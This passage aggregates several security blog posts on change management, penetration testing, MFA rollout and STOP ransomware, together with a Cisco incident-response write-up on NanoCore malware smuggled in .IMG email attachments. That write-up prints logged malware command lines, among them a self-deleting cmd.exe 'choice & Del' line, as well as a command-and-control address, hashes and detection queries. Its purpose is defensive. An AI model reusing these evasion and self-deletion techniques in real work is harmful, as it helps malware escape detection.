  3. Reevaluate cyber insurance on an annual basis and revisit its use and requirements for the organization. Ensure that it’s effective against attacks that could be considered “acts of war,” which might otherwise not be covered by the organization’s policy. Review your policy and ask: What happens if the threat actor was a nation state aiming for another nation state, placing your organization in the crossfire?

Gain buy-in through a frictionless user experience

Shadow IT” is a persistent problem when there is no sanctioned way for users to collaborate with the outside world. Similarly, users save and hoard emails when, in response to an overly zealous data retention policy, their emails are deleted after 30 days.

Digital transformation introduces a sea of change in how cybersecurity is implemented. It’s paramount to provide the user with the most frictionless user experience available, adopting mobile-first, cloud-first philosophies.

Ignoring the user experience in your change implementation plan will only lead users to identify clever ways to circumvent frustrating security controls. Look for ways to prioritize the user experience even while meeting security and compliance goals.

Incremental change versus tearing off the band-aid

Imagine slowly replacing the interior and exterior components of your existing vehicle one by one until you have a “new” car. It doesn’t make sense: You still have to drive the car, even while the replacements are being performed!

Similarly, I’ve seen organizations take this approach in implementing change, attempting to create a modern workplace over a long period of time. However, this draws out complex, multi-platform headaches for months and years, leading to user confusion, loss of confidence in IT, and lost productivity. You wouldn’t “purchase” a new car this way; why take this approach for your organization?

Rather than mixing old parts with new parts, you would save money, shop time, and operational (and emotional) complexity by simply trading in your old car for a new one.

Fewer organizations take this alternative approach of “tearing off the band-aid.” If the user experience is frictionless, more efficient, and enhances the ease of data protection, an organization’s highly motivated employee base will adapt much more easily.

Stayed tuned and stay updated

Stay tuned for more! In my next installments, I will cover the topics of process and technology, respectively, and their role in changing the security monolith. Technology on its own solves nothing. What good are building supplies and tools without a blueprint? Similarly, process is the orchestration of the effort, and is necessary to enhance an organization’s cybersecurity, privacy, compliance, and productivity.

In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Changing the monolith—Part 2: Whose support do you need? appeared first on Microsoft Security.

What is Network Penetration Testing?

Estimated reading time: 2 minutes

Network Penetration Testing, also known as pen testing or ethical hacking, refers to the practice of identifying vulnerabilities in networks, systems, hosts or other related devices in a controlled environment. The objective of Network Penetration Testing is to identify and plug gaps in a network’s security apparatus before external actors like hackers find them.

Much like white hat hackers, network penetration tests are a type of external audit deployed by organizations from different sectors. Though similar to vulnerability assessments, there is a major difference: network penetration testing is not dependent on a signature-based approach which could be outdated and unable to discover real-world vulnerabilities. Network penetration testing simulates how a real-world attack on the network may happen. In that sense, it provides organizations with a perspective from the eye of the hacker and hence enables a better understanding of its own security posture.

To ensure there is standardization in approach, network penetration testing normally follows the globally-accepted Penetration Testing Execution Standard (PTES) which was developed in 2009. The methodology generally consists of the below steps –

Pre-engagement interactions

At this stage, the scope of the testing is outlined and finalized. Other pre-engagement interactions are also conducted to fully finalize on aspects of testing, analysis and results.

Intelligence Gathering

This stage is primarily involved in information gathering for the purpose of gaining knowledge about the network or system to be penetrated and its respective connections.

Threat Modeling

In this stage, vulnerabilities are identified within the network through automated scans or deep-dive manual techniques.

Vulnerability Analysis

This stage involves the documentation and analysis of vulnerabilities within the network to formulate an attack plan.

Exploitation

This is the stage where the actual exploitation attempt takes placed on the basis of the analysis of the vulnerabilities discovered.

Post Exploitation

In the Post Exploitation phase, further analysis is done of the exploited network to identify other means of access.

Reporting in Network Penetration Testing

This is a fact-finding stage where findings are analyzed and compiled into a report for action to be taken.

The cybersecurity industry is undergoing a paradigm shift where the focus for enterprises is rapidly shifting from threat detection to threat prevention. In such a scenario, it is imperative that enterprises have regular network penetration tests to gain a better understanding of their security posture. It is not enough anymore to depend on cybersecurity solutions alone; efforts must be taken to test and ensure cybersecurity stays up-to-date against ever-changing threats.

Red Team Assessments by Seqrite

In this regard, enterprises can consider Red Team Assessments which have been recommended by the Reserve Bank of India, India’s central bank, for banking institutions. In a red team exercise, highly trained security consultants attempt to breach the security of the organization to expose potential physical, hardware, software and human vulnerabilities.

A comprehensive Red Team exercise exposes vulnerabilities and risks regarding

  • Networks, applications, switches, mobile devices
  • Social engineering (onsite, telephone, email/text, chat)
  • Physical attacks (pen-drive bypass, camera evasion, alarm bypass, Wi-Fi attack etc.)

Red Team Audits are one among various services offered by Seqrite to enable organizations to proactively protect IT assets and respond to cybersecurity threats. Other services offered include Technical Audits, Compliance Audits, Security Management and Security Consulting.

The post What is Network Penetration Testing? appeared first on Seqrite Blog.

Embedding security, the right way

As organizations proceed to move their processes from the physical world into the digital, their risk profile changes, too – and this is not a time to take risks. By not including security into DevOps processes, organizations are exposing their business in new and surprising ways. DevOps DevOps has accelerated software development dramatically, but it has also created a great deal of pain for traditional security teams raised up on performing relatively slow testing. Moving … More

The post Embedding security, the right way appeared first on Help Net Security.

Emotet remains the dark market leader for delivery-as-a-service

The vast majority of nationally sponsored cybersecurity incidents take the form of espionage through data exfiltration, with frequent employment of remote access tool Plug-X, according to the annual threat report by eSentire. Emotet is the leader The report found that Emotet accounted for almost 20% of confirmed malware incidents, reinforcing its role in the black market as the preferred delivery tool. Emotet was the most observed threat both on networks and on endpoints, achieving this … More

The post Emotet remains the dark market leader for delivery-as-a-service appeared first on Help Net Security.

Six trends attracting the attention of enterprise technology leaders

Organizations around the world will accelerate enterprise technology investment in 2020, leveraging digital improvements to make them more competitive, improve connections with consumers, and keep up with the increasing demands of privacy regulation and security needs. Hyland has identified six technology trends that will drive these improvements and demand the attention of CIOs CTOs in the coming year and beyond. Prioritize cloud control Organizations will opt for managed cloud services to increase security and efficiency. … More

The post Six trends attracting the attention of enterprise technology leaders appeared first on Help Net Security.

Global security services industry to experience spend growth of more than $80 billion

The global security services industry is poised to experience spend growth of more than $80 billion between 2019-2024 at a CAGR of over 8% during the forecast period, according to SpendEdge. Factors such as the increase in the instances of IP infringement, the frequency of economic and sporting events are exposing masses to significant security risks. This is creating a pressing requirement to engage security services across the domestic and business sectors across the globe … More

The post Global security services industry to experience spend growth of more than $80 billion appeared first on Help Net Security.

Disk Image Deception

Cisco’s Computer Security Incident Response Team (CSIRT) detected a large and ongoing malspam campaign leveraging the .IMG file extension to bypass automated malware analysis tools and infect machines with a variety of Remote Access Trojans. During our investigation, we observed multiple tactics, techniques, and procedures (TTPs) that defenders can monitor for in their environments. Our incident response and security monitoring team’s analysis on a suspicious phishing attack uncovered some helpful improvements in our detection capabilities and timing.

In this case, none of our intelligence sources had identified this particular campaign yet. Instead, we detected this attack with one of our more exploratory plays looking for evidence of persistence in the Windows Autoruns data. This play was successful in detecting an attack against a handful of endpoints using email as the initial access vector and was able to evade our defenses at the time. Less than a week after the incident, we received alerts from our retrospective plays for this same campaign once our integrated threat intelligence sources delivered the indicators of compromise (IOC). This blog is a high level write-up of how we adapted to a potentially successful attack campaign and our tactical analysis to help prevent and detect future campaigns. 

(This blog was co-authored by Jeff Bollinger & William Sheldon)

Incident Response Techniques and Strategy

The Cisco Computer Security and Incident Response Team (CSIRT) monitors Cisco for threats and attacks against our systems, networks, and data. The team provides around the globe threat detection, incident response, and security investigations. Staying relevant as an IR team means continuously developing and adapting the best ways to defend the network, data, and infrastructure. We’re constantly experimenting with how to improve the efficiency of our data-centric playbook approach in the hope it will free up more time for threat hunting and more in-depth analysis and investigations. Part of our approach has been that as we discover new methods for detecting risky activity, we try to codify those methods and techniques into our incident response monitoring playbook to keep an eye on any potential future attacks.

Although some malware campaigns can slip past the defenses with updated techniques, we preventatively block the well-known, or historical indicators and leverage broad, exploratory analysis playbooks that spotlight more on how attackers operate and infiltrate. In other words, there is value in monitoring for the basic atomic indicators of compromised like IP addresses, domain names, file hashes, etc. but to go further you really have to look broadly at more generic attack techniques. These playbooks, or plays, help us find out about new attack campaigns that are possibly targeted and potentially more serious. While some might label this activity “threat hunting”, this data exploration process allows us to discover, track, and potentially share new indicators that get exposed during a deeper analysis. 

Defense in depth demands that we utilize additional data sources in case attackers successfully evade one or more of our defenses, or if they were able to obscure their malicious activities enough to avoid detection. Recently we discovered a malicious spam campaign that almost succeeded due to a missed early detection. In one of our exploratory plays, we use daily diffs for all the Microsoft Windows registry autorun key changes since the last boot. Known as “Autoruns“, this data source ultimately helped us discover an ongoing attack that was attempting to deliver a remote access trojan (RAT). Along with the more mundane Windows event logs, we pieced together the attack from the moment it arrived and made some interesting discoveries on the way — most notably how the malware seemingly slipped past our front line filters. Not only did we uncover many technical details about the campaign, but we also used it as an opportunity to refine our incident response detection techniques and some of our monitoring processes.

IMG File Format Analysis

.IMG files are traditionally used by disk image files to store raw dumps of either a magnetic disk or of an optical disc. Other disk image file formats include ISO and BIN. Previously, mounting disk image file files on Windows required the user to install third-party software. However Windows 8 and later automatically mount IMG files on open. Upon mounting, Windows File Explorer displays the data inside the .IMG file to the end user. Although disk image files are traditionally utilized for storing raw binary data, or bit-by-bit copies of a disk, any data could be stored inside them. Because of the newly added functionality to the Windows core operating system, attackers are abusing disk image formats to “smuggle” data past antivirus engines, network perimeter defenses, and other auto mitigation security tooling. Attackers have also used the capability to obscure malicious second stage files hidden within a filesystem by using ISO and DMG (to a lesser extent). Perhaps the IMG extension also fools victims into considering the attachment as an image instead of a binary pandora’s box.

Know Where You’re Coming From

As phishing as an attack vector continues to grow in popularity, we have recently focused on several of our email incident response plays around detecting malicious attachments, business email compromise techniques like header tampering or DNS typosquatting, and preventative controls with inline malware prevention and malicious URL rewriting.

Any security tool that has even temporarily outdated definitions of threats or IOCs will be unable to detect a very recent event or an event with a recent, and therefore unknown, indicator. To ensure that these missed detections are not overlooked, we take a retrospective look back to see if any newly observed indicators are present in any previously delivered email. So when a malicious attachment is delivered to a mailbox, if the email scanners and sandboxes do not catch it the first time, our retrospective plays look back to see if the updated indicators are triggered. Over time sandboxes update their detection abilities and previously “clean” files could change status. The goal is to detect this changing status and if we have any exposure, then we reach out and remediate the host.

 

This process flow shows our method for detecting and responding to updated verdicts from sandbox scanners. During this process we collect logs throughout to ensure we can match against hashes or any other indicator or metadata we collect: 

Retrospective Email Detection Incident Response

Figure 1: Flow chart for Retrospective alerting

This process in combination with several other threat hunting style plays helped lead us to this particular campaign. The IMG file isn’t unique by any means but was rare and stood out to our analysts immediately when combined with the file name as a fake delivery invoice – one of the more tantalizing and effective types of phishing lures.

Incident Response and Analysis

We needed to pull apart as much of the malicious components as possible to understand how this campaign worked and how it might have slipped our defenses temporarily. The process tree below shows how the executable file dropped from the original IMG file attachment after mounting led to a Nanocore installation:

Analysis Behavior Graph

Figure 2: Visualization of the malicious process tree.

 

Autoruns

As part of our daily incident response playbook operations, we recently detected a suspicious Autoruns event on an endpoint. This log (Figure 2) indicated that an unsigned binary with multiple detections on the malware analysis site, VirusTotal, had established persistence using the ‘Run’ registry key. Anytime the user logged in, the binary referenced in the “run key” would automatically execute – in this case the binary called itself “filename.exe” and dropped in the typical Windows “%SYSTEMROOT%\%USERNAME%\AppData\Roaming” directory:

{

    "enabled": "enabled",

    "entry": "startupname",

    "entryLocation": "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",

    "file_size": "491008",

    "hostname": "[REDACTED]",

    "imagePath": "c:\\users\\[REDACTED]\\appdata\\roaming\\filename.exe",

    "launchString": "C:\\Users\\[REDACTED]\\AppData\\Roaming\\filename.exe",

    "md5": "667D890D3C84585E0DFE61FF02F5E83D",

    "peTime": "5/13/2019 12:48 PM",

    "sha256": "42CCA17BC868ADB03668AADA7CF54B128E44A596E910CFF8C13083269AE61FF1",

    "signer": "",

    "vt_link": "https://www.virustotal.com/file/42cca17bc868adb03668aada7cf54b128e44a596e910cff8c13083269ae61ff1/analysis/1561620694/",

    "vt_ratio": "46/73",

    "sourcetype": "autoruns",

}


Figure 3: Snippet of the event showing an unknown file attempting to persist on the victim host

Many of the anti-virus engines on VirusTotal detected the binary as the NanoCore Remote Access Trojan (RAT), a well known malware kit sold on underground markets which enables complete control of the infected computer: recording keystrokes, enabling the webcam, stealing files, and much more. Since this malware poses a huge risk and the fact that it was able to achieve persistence without getting blocked by our endpoint security, we prioritized investigating this alert further and initiated an incident. 

Once we identified this infected host using one of our exploratory Autoruns plays, the immediate concern was containing the threat to mitigate as much potential loss as possible. We download a copy of the dropper malware from the infected host and performed additional analysis. Initially we wanted to confirm if other online sandbox services agreed with the findings on VirusTotal. Other services including app.any.run also detected Nanocore based on a file called run.dat being written to the %APPDATA%\Roaming\{GUID} folder as shown in Figure 3: 

app.any.run analysis

Figure 4: app.any.run analysis showing Nanocore infection

The sandbox report also alerted us to an unusual outbound network connection from RegAsm.exe to 185.101.94.172 over port 8166.

Now that we were confident this was not a false positive, we needed to find the root cause of this infection, to determine if any other users are at risk of being victims of this campaign. To begin answering this question, we pulled the Windows Security Event Logs from the host using our asset management tool to gain a better understanding of what occurred on the host at the time of the incident. Immediately, a suspicious event that was occurring every second  jumped out due to the unusual and unexpected activity of a file named “DHL_Label_Scan _ June 19 2019 at 2.21_06455210_PDF.exe” spawning the Windows Assembly Registration tool RegAsm.exe. 

Process Information:

 New Process ID:  0x4128

 New Process Name: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

 Token Elevation Type: %%1938

 Mandatory Label:  Mandatory Label\Medium Mandatory Level

 Creator Process ID: 0x2ba0

 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe

 Process Command Line: "C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"



 Figure 5: New process spawned from a ‘CdRom0’ device (the fake .img) calling the Windows Assembly Registration tool

This event stands out for several reasons.

  • The filename:
    1. Attempts to social engineer the user into thinking they are executing a PDF by appending “_PDF”
    2. “DHL_Label_Scan” Shipping services are commonly spoofed by adversaries in emails to spread malware.
  • The file path:
    1. \Device\CdRom0\ is a special directory associated with a CD-ROM that has been inserted into the disk drive.
    2. A fake DHL label is a strange thing to have on a CD-ROM and even stranger to insert it to a work machine and execute that file.
  • The process relationship:
    1. Adversaries abuse the Assembly Registration tool “RegAsm.exe” for bypassing process whitelisting and anti-malware protection.
    2. MITRE tracks this common technique as T1121 indicating, “Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration”
    3. We saw this technique in the app.any.run sandbox report.
  • The frequency of the event:
    1. The event was occurring every second, indicating some sort of command and control or heartbeat activity.

 

Mount Up and Drop Out

 

At this point in the investigation, we have now uncovered a previously unseen suspicious file: “DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe”, which is strangely located in the \Device\CdRom0\ directory, and the original “filename.exe” used to establish persistence.

The first event in this process chain shows explorer.exe spawning the malware from the D: drive.

Process Information:

 New Process ID:  0x2ba0

 New Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe

 Token Elevation Type: %%1938

 Mandatory Label:  Mandatory Label\Medium Mandatory Level

 Creator Process ID: 0x28e8

 Creator Process Name: C:\Windows\explorer.exe

 Process Command Line: "D:\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe"

Figure 6: Additional processes spawned by the fake PDF

 

The following event is the same one that originally caught our attention, which shows the malware spawning RegAsm.exe (eventually revealed to be Nanocore) to establish communication with the command and control server:

 

Process Information:

 New Process ID:  0x4128

 New Process Name: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

 Token Elevation Type: %%1938

 Mandatory Label:  Mandatory Label\Medium Mandatory Level

 Creator Process ID: 0x2ba0

 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe

 Process Command Line: "C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

Figure 7: RegAsm reaching out to command and control servers

 

Finally, the malware spawns cmd.exe and deletes the original binary using the built-in choice command: 

Process Information:

 New Process ID:  0x2900

 New Process Name: C:\Windows\SysWOW64\cmd.exe

 Token Elevation Type: %%1938

 Mandatory Label:  Mandatory Label\Medium Mandatory Level

 Creator Process ID: 0x2ba0

 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe

 Process Command Line: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "D:\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe"

 

Figure 8: Evidence of deleting the original dropper.

 

At this point in the investigation of the original dropper and the subsequent suspicious files, we still could not answer how the malware ended up on this user’s computer in the first place. However with the filename of the original dropper to pivot with, a quick web search for the filename turned up a thread on Symantec.com from a user asking for assistance with the file in question. In this post, they write that they recognize the filename from a malspam email they received. Based on the Symantec thread and other clues, such as the use of the shipping service DHL in the filename, we now know the delivery method is likely via email.

Delivery Method Techniques

We used the following Splunk query to search our Email Security Appliance logs for the beginning of the filename we found executing RegAsm.exe in the Windows Event Logs.

index=esa earliest=-30d

[search index=esa "DHL*.img" earliest=-30d

| where isnotnull(cscoMID)

| fields + cscoMID,host

| format]

| transaction cscoMID,host

| eval wasdelivered=if(like(_raw, "%queued for delivery%"), "yes", "no")

| table esaTo, esaFrom, wasdelivered, esaSubject, esaAttachment, Size, cscoMID, esaICID, esaDCID, host

Figure 9: Splunk query looking for original DHL files.

As expected, the emails all came from the spoofed sender address noreply@dhl.com with some variation of the subject “Re: DHL Notification / DHL_AWB_0011179303/ ETD”. In total, CSIRT identified a total of 459 emails from this campaign sent to our users. Of those 459 emails, 396 were successfully delivered and contained 18 different Nanocore samples.

396 malicious emails making it past our well-tuned and automated email mitigation tools is no easy feat. While the lure the attacker used to social engineer their victims was common and unsophisticated, the technique they employed to evade defenses was successful – for a time.

Detecting the Techniques

During the lessons learned phase after this campaign, CSIRT developed numerous incident response detection rules to alert on newly observed techniques discovered while analyzing this incident. The first and most obvious being, detecting malicious disk image files successfully delivered to a user’s inbox. The false-positive rate for this specific type of attack is low in our environment, with a few exceptions here and there – easily tuned out based on the sender. This play could be tuned to look only for disk image files with a small file size if they are more prevalent in your environment.

Another valuable detection rule we developed after this incident is monitoring for suspicious usage (network connections) of the registry assembly executable on our endpoints, which is ultimately the process Nanocore injected itself into and was using to facilitate C2 communication. Also, it is pretty unlikely to ever see legitimate use of the choice command to create a self-destructing binary of sorts, so monitoring for execution of choice with the command-line arguments we saw in the Windows Event above should be a high fidelity alert.

Some additional, universal takeaways from this incident:

  1. Auto-mitigation tools should not be treated as a silver bullet – Effective security monitoring, rapid incident response, and defense in depth/layers is more important.
  2. Obvious solutions such as blocking extensions at email gateway are not always realistic in large, multifunction enterprises – .IMG files were legitimately being used by support engineers and could not be blocked.
  3. Malware campaigns can slip right past defenders on occasion, so a wide playbook that focuses on how attackers operate and infiltrate (TTPs) is key for finding new and unknown malware campaigns in large enterprises (as opposed to relying exclusively on indicators of compromise.)

 

Indicators Of Compromise (IOCS)

2b6f19fac64c847258fe776a2ea6444cc469ac6a348e714fcab23cc6cb2c5b74

327c646431a644192aae8a0d0ebe75f7a2b98d7afa7a446afa97e2a004ca64b0

3718957d7f0da489935ce35b6587a6c93f25cff69d233381131b757778826da3

3873ef89a74a9c03ba363727b20429a45f29a525532d0ef9027fce2221f64f60

3a7c23a01a06c257b2f5b59647461ebf8f58209a598390c2910d20a9c5757c62

4eb2af63e121c22df7945258991168be4a70aa32669db173743701aab94383fb

5d14e5959c05589978680e46bffd586e10c1fcabc21ddd94c713520cd0037640

6a2af44e186531d07c53122d42280bc18929d059b98f0449c1a646d66a778ffb

80ab695da86e97861b294b72ba1ef2e8e2f322e7ec0d0834e71f92497515b63d

a34aa05710cf0afb111181c23468c2dcc3a2c2d6aa496c9dffe45dde11e2c4d1

abf41ea1909a39c644e5b480b176ef8a3c4a80e2ee8b447d4320e777384392cf

af5d9ca1ed166a8d378c5b5ed7e187035f374b4376bdd632c3a2ee156613fd29

afb87da69c9ad418ac29af27602a450a7eae63132443c7bc56ab17785dd3bbfd

d871704baad496b47b15da54e7766c0a468ac66337d99032908ad7d4732ecffb

da79495b8b75c9b122a1116494f68661ec45a1fdfb8fd39c000f1f691b39bc13

deb805ce329f17a48165328879b854674eb34abd704eeb575e643574f31d3e83

eaee0577806861c23bef8737e5ba2d315e9c6bfa38bf409dda9a2a13599615b4

fc0cf381e433cd578128be91dfd7567d2294a6d3ff4d2ce0e3f4046442b1f5f0

185.101.94.172:8166

The post Disk Image Deception appeared first on Cisco Blogs.

How to implement Multi-Factor Authentication (MFA)

Another day, another data breach. If the regular drumbeat of leaked and phished accounts hasn’t persuaded you to switch to Multi-Factor Authentication (MFA) already, maybe the usual January rush of ‘back to work’ password reset requests is making you reconsider. When such an effective option for protecting accounts is available, why wouldn’t you deploy it straight away?

The problem is that deploying MFA at scale is not always straightforward. There are technical issues that may hold you up, but the people side is where you have to start. The eventual goal of an MFA implementation is to enable it for all your users on all of your systems all of the time, but you won’t be able to do that on day one.

To successfully roll out MFA, start by being clear about what you’re going to protect, decide what MFA technology you’re going to use, and understand what the impact on employees is going to be. Otherwise, your MFA deployment might grind to a halt amid complaints from users who run into problems while trying to get their job done.

Before you start on the technical side, remember that delivering MFA across a business is a job for the entire organization, from the security team to business stakeholders to IT departments to HR and to corporate communications and beyond, because it has to support all the business applications, systems, networks and processes without affecting workflow.

Campaign and train

Treat the transition to MFA like a marketing campaign where you need to sell employees on the idea—as well as provide training opportunities along the way. It’s important for staff to understand that MFA is there to support them and protect their accounts and all the their data, because that may not be their first thought when met with changes to the way they sign in to the tools they use every day. If you run an effective internal communications campaign that makes it clear to users what they need to do and, more importantly, why they need to do it, you’ll avoid them seeing MFA as a nuisance or misunderstanding it as ‘big brother’ company tracking.

The key is focusing on awareness: in addition to sending emails—put up posters in the elevator, hang banner ads in your buildings, all explaining why you’re making the transition to MFA. Focus on informing your users, explaining why you’re making this change—making it very clear what they will need to do and where they can find instructions, documentation, and support.

Also, provide FAQs and training videos, along with optional training sessions or opportunities to opt in to an early pilot group (especially if you can offer them early access to a new software version that will give them features they need). Recognize that MFA is more work for them than just using a password, and that they will very likely be inconvenienced. Unless you are able to use biometrics on every device they will have to get used to carrying a security key or a device with an authenticator app with them all the time, so you need them to understand why MFA is so important.

It’s not surprising that users can be concerned about a move to MFA. After all, MFA has sometimes been done badly in the consumer space. They’ll have seen stories about social networks abusing phone numbers entered for security purposes for marketing or of users locked out of their accounts if they’re travelling and unable to get a text message. You’ll need to reassure users who have had bad experiences with consumer MFA and be open to feedback from employees about the impact of MFA policies. Like all tech rollouts, this is a process.

If you’re part of an international business you have more to do, as you need to account for global operations. That needs wider buy-in and a bigger budget, including language support if you must translate training and support documentation. If you don’t know where to start, Microsoft provides communication templates and user documentation you can customize for your organization.

Start with admin accounts

At a minimum, you want to use MFA for all your admins, so start with privileged users. Administrative accounts are your highest value targets and the most urgent to secure, but you can also treat them as a proof of concept for wider adoption. Review who these users are and what privileges they have—there are probably more accounts than you expect with far more privileges than are really needed.

At the same time, look at key business roles where losing access to email—or having unauthorized emails sent—will have a major security impact. Your CEO, CFO, and other senior leaders need to move to MFA to protect business communications.

Use what you’ve learned to roll out MFA to high value groups to plan a pilot deployment—which includes employees from across the business who require different levels of security access—so your final MFA deployment is optimized for mainstream employees without hampering the productivity of those working with more sensitive information, whether that’s the finance team handling payroll or developers with commit rights. Consider how you will cover contractors and partners who need access as well.

Plan for wider deployment

Start by looking at what systems you have that users need to sign in to that you can secure with MFA. Remember that includes on-premises systems—you can incorporate MFA into your existing remote access options, using Active Directory Federation Services (AD FS), or Network Policy Server and use Azure Active Directory (Azure AD) Application Proxy to publish applications for cloud access.

Concentrate on finding any networks or systems where deploying MFA will take more work (for example, if SAML authentication is used) and especially on discovering vulnerable apps that don’t support anything except passwords because they use legacy or basic authentication. This includes older email systems using MAPI, EWS, IMAP4, POP3, SMTP, internal line of business applications, and elderly client applications. Upgrade or update these to support modern authentication and MFA where you can. Where this isn’t possible, you’ll need to restrict them to use on the corporate network until you can replace them, because critical systems that use legacy authentication will block your MFA deployment.

Be prepared to choose which applications to prioritize. As well as an inventory of applications and networks (including remote access options), look at processes like employee onboarding and approval of new applications. Test how applications work with MFA, even when you expect the impact to be minimal. Create a new user without admin access, use that account to sign in with MFA and go through the process of configuring and using the standard set of applications staff will use to see if there are issues. Look at how users will register for MFA and choose which methods and factors to use, and how you will track and audit registrations. You may be able to combine MFA registration with self-service password reset (SSPR) in a ‘one stop shop,’ but it’s important to get users to register quickly so that attackers can’t take over their account by registering for MFA, especially if it’s for a high-value application they don’t use frequently. For new employees, you should make MFA registration part of the onboarding process.

Make MFA easier on employees

MFA is always going to be an extra step, but you can choose MFA options with less friction, like using biometrics in devices or FIDO2 compliant factors such as Feitan or Yubico security keys. Avoid using SMS if possible. Phone-based authentication apps like the Microsoft Authenticator App are an option, and they don’t require a user to hand over control of their personal device. But if you have employees who travel to locations where they may not have connectivity, choose OATH verification codes, which are automatically generated rather than push notifications that are usually convenient but require the user to be online. You can even use automated voice calls: letting users press a button on the phone keypad is less intrusive than giving them a passcode to type in on screen.

Offer a choice of alternative factors so people can pick the one that best suits them. Biometrics are extremely convenient, but some employees may be uncomfortable using their fingerprint or face for corporate sign-ins and may prefer receiving an automated voice call.

Make sure that you include mobile devices in your MFA solution, managing them through Mobile Device Management (MDM), so you can use conditional and contextual factors for additional security.

Avoid making MFA onerous; choose when the extra authentication is needed to protect sensitive data and critical systems rather than applying it to every single interaction. Consider using conditional access policies and Azure AD Identity Protection, which allows for triggering two-step verification based on risk detections, as well as pass-through authentication and single-sign-on (SSO).

If MFA means that a user accessing a non-critical file share or calendar on the corporate network from a known device that has all the current OS and antimalware updates sees fewer challenges—and no longer faces the burden of 90-day password resets—then you can actually improve the user experience with MFA.

Have a support plan

Spend some time planning how you will handle failed sign-ins and account lockouts. Even with training, some failed sign-ins will be legitimate users getting it wrong and you need to make it easy for them to get help.

Similarly, have a plan for lost devices. If a security key is lost, the process for reporting that needs to be easy and blame free, so that employees will notify you immediately so you can expire their sessions and block the security key, and audit the behavior of their account (going back to before they notified you of the loss). Security keys that use biometrics may be a little more expensive, but if they’re lost or stolen, an attacker can’t use them. If possible, make it a simple, automated workflow, using your service desk tools.

You also need to quickly get them connected another way so they can get back to work. Automatically enrolling employees with a second factor can help. Make that second factor convenient enough to use that they’re not unable to do their job, but not so convenient that they keep using it and don’t report the loss: one easy option is allowing one-time bypasses. Similarly, make sure you’re set up to automatically deprovision entitlements and factors when employees change roles or leave the organization.

Measure and monitor

As you deploy MFA, monitor the rollout to see what impact it has on both security and productivity and be prepared to make changes to policies or invest in better hardware to make it successful. Track security metrics for failed login attempts, credential phishing that gets blocked and privilege escalations that are denied.

Your MFA marketing campaign also needs to continue during and after deployment, actively reaching out to staff and asking them to take back in polls or feedback sessions. Start that with the pilot group and continue it once everyone is using MFA.

Even when you ask for it, don’t rely on user feedback to tell you about problems. Check helpdesk tickets, logs, and audit options to see if it’s taking users longer to get into systems, or if they’re postponing key tasks because they’re finding MFA difficult, or if security devices are failing or breaking more than expected. New applications and new teams in the business will also mean that MFA deployment needs to be ongoing, and you’ll need to test software updates to see if they break MFA; you have to make it part of the regular IT process.

Continue to educate users about the importance of MFA, including running phishing training and phishing your own employees (with more training for those who are tricked into clicking through to fake links).

MFA isn’t a switch you flip; it’s part of a move to continuous security and assessment that will take time and commitment to implement. But if you approach it in the right way, it’s also the single most effective step you can take to improve security.

About the authors

Ann Johnson is the Corporate Vice President for Cybersecurity Solutions Group for Microsoft. She is a member of the board of advisors for FS-ISAC (The Financial Services Information Sharing and Analysis Center), an advisory board member for EWF (Executive Women’s Forum on Information Security, Risk Management & Privacy), and an advisory board member for HYPR Corp. Ann recently joined the board of advisors for Cybersecurity Ventures

Christina Morillo is a Senior Program Manager on the Azure Identity Engineering Product team at Microsoft. She is an information security and technology professional with a background in cloud technologies, enterprise security, and identity and access. Christina advocates and is passionate about making technology less scary and more approachable for the masses. When she is not at work, or spending time with her family, you can find her co-leading Women in Security and Privacy’s NYC chapter and supporting others as an advisor and mentor. She lives in New York City with her husband and children.

Learn more

To find out more about Microsoft’s Cybersecurity Solutions, visit the Microsoft Security site, or follow Microsoft Security on Twitter at Microsoft Security Twitter or Microsoft WDSecurity Twitter.

To learn more about Microsoft Azure Identity Management solutions, visit this Microsoft overview page and follow our Identity blog. You can also follow us @AzureAD on Twitter.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How to implement Multi-Factor Authentication (MFA) appeared first on Microsoft Security.

STOP (Djvu) Ransomware: Ransom For Your Shady Habits!

Estimated reading time: 9 minutes

With almost 200 extensions, STOP (djvu) ransomware can be said to be 2019’s most active and widespread ransomware. Although this ransomware was active a year before, it started its campaign aggressively in early 2019. To evade detection, it has been continuously changing its extensions and payloads. For earlier infections, data recovery was easier if the key was not online CnC generated. Once payload was received, decryption was easier as it used non-symmetric encryption algorithms and for offline systems, it used the same set of keys. There has been a change in its encryption strategy from mid-2019, which made the decryption of infected files difficult. By observing continuous improvement in infection vectors and payloads, one can consider STOP actors to be one of the most active malware authors of 2019.

Here, we will discuss in detail about its behavior and updated file encryption technique. We will also go through its parallel activities of downloading other malware and their behavior. The statistics would elaborate its prominence in the last few months.

Infection Vectors:

According to our telemetry, this ransomware is seen spreading through cracked applications, keygens, activators, fake application setup and fake windows updates. While taking a look at the infection vectors and the ransom demanded, we can say that these actors believed in quantity instead of quality like Ryuk did. According to our observations, cracked files or fake activators for different software like Tally, Autocad, Adobe Photoshop, Internet Download Manager, Microsoft Office, Opera browser, VMware Workstation, Quick Heal Total Security, etc. were seen spreading this ransomware.

Payload Behaviour:

Fig. 1: ProcessMap

